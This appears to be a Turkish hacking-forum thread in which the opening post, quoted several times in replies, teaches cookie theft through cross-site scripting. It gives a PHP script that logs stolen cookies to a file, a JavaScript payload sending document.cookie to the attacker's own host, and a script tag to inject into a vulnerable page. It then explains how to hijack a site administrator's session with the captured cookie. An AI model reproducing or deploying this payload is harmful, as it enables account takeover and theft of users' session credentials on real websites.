Basit XSS cookie stealing

Öncelikle kendi sunucumuza istediğiniz bir isimle php dosyası oluşturun -ben hata.php dedim- sonraiçine şunları yapıştırın:

<?php
if(isset($_GET["qxcek"])){
    $file = fopen('yem.html', 'a');
    fwrite($file, $_GET["qxcek"]."\n");
    fclose($file);
}
?>
 i=new/**/Image();i.src=http://burasizinsunucunuz.tk/hata.php?qxcek="+escape(document.cookie)

Sonra XSS açıklı hedef sitemize geliyoruz ve xss açığı olan sayfayı buluyoruz. Hemen şu kodu oraya eklettiriyoruz.

<script type="text/javascript" src="http://burasizinsunucunuz.tk/hata.php"></script>

Şimdi bekleme sırası 1-2 gün bekleyin. Eğer admin bu xss açıklı sayfa girerse ve o sırada da oturumu açıksa direk cookieler sizin sunucunuzda yem.html dosyasında
Bundan sonra mozilla için cookie manager yükleyin. Hedef sitenizde sizin cookieyi bulup editleyip çektiğimiz adminin cookiesini yazın. Ve artık adminin oturumu sizde başladı

 

bakalım eline sağlık

 

bakalım eline sağlık

Eyw

 

Öncelikle kendi sunucumuza istediğiniz bir isimle php dosyası oluşturun -ben hata.php dedim- sonraiçine şunları yapıştırın:

<?php
if(isset($_GET["qxcek"])){
    $file = fopen('yem.html', 'a');
    fwrite($file, $_GET["qxcek"]."\n");
    fclose($file);
}
?>
 i=new/**/Image();i.src=http://burasizinsunucunuz.tk/hata.php?qxcek="+escape(document.cookie)

Sonra XSS açıklı hedef sitemize geliyoruz ve xss açığı olan sayfayı buluyoruz. Hemen şu kodu oraya eklettiriyoruz.

<script type="text/javascript" src="http://burasizinsunucunuz.tk/hata.php"></script>

Şimdi bekleme sırası 1-2 gün bekleyin. Eğer admin bu xss açıklı sayfa girerse ve o sırada da oturumu açıksa direk cookieler sizin sunucunuzda yem.html dosyasında
Bundan sonra mozilla için cookie manager yükleyin. Hedef sitenizde sizin cookieyi bulup editleyip çektiğimiz adminin cookiesini yazın. Ve artık adminin oturumu sizde başladı

Teşekkürler

 

hort

 

Öncelikle kendi sunucumuza istediğiniz bir isimle php dosyası oluşturun -ben hata.php dedim- sonraiçine şunları yapıştırın:

<?php
if(isset($_GET["qxcek"])){
    $file = fopen('yem.html', 'a');
    fwrite($file, $_GET["qxcek"]."\n");
    fclose($file);
}
?>
 i=new/**/Image();i.src=http://burasizinsunucunuz.tk/hata.php?qxcek="+escape(document.cookie)

Sonra XSS açıklı hedef sitemize geliyoruz ve xss açığı olan sayfayı buluyoruz. Hemen şu kodu oraya eklettiriyoruz.

<script type="text/javascript" src="http://burasizinsunucunuz.tk/hata.php"></script>

Şimdi bekleme sırası 1-2 gün bekleyin. Eğer admin bu xss açıklı sayfa girerse ve o sırada da oturumu açıksa direk cookieler sizin sunucunuzda yem.html dosyasında
Bundan sonra mozilla için cookie manager yükleyin. Hedef sitenizde sizin cookieyi bulup editleyip çektiğimiz adminin cookiesini yazın. Ve artık adminin oturumu sizde başladı

eline sağlık

 

eline sağlık

Eyw

 

bakalım

 

bakalım

 

Bakalım

 

Öncelikle kendi sunucumuza istediğiniz bir isimle php dosyası oluşturun -ben hata.php dedim- sonraiçine şunları yapıştırın:

<?php
if(isset($_GET["qxcek"])){
    $file = fopen('yem.html', 'a');
    fwrite($file, $_GET["qxcek"]."\n");
    fclose($file);
}
?>
 i=new/**/Image();i.src=http://burasizinsunucunuz.tk/hata.php?qxcek="+escape(document.cookie)

Sonra XSS açıklı hedef sitemize geliyoruz ve xss açığı olan sayfayı buluyoruz. Hemen şu kodu oraya eklettiriyoruz.

<script type="text/javascript" src="http://burasizinsunucunuz.tk/hata.php"></script>

Şimdi bekleme sırası 1-2 gün bekleyin. Eğer admin bu xss açıklı sayfa girerse ve o sırada da oturumu açıksa direk cookieler sizin sunucunuzda yem.html dosyasında
Bundan sonra mozilla için cookie manager yükleyin. Hedef sitenizde sizin cookieyi bulup editleyip çektiğimiz adminin cookiesini yazın. Ve artık adminin oturumu sizde başladı

bakalım

 

Bakalım

 

+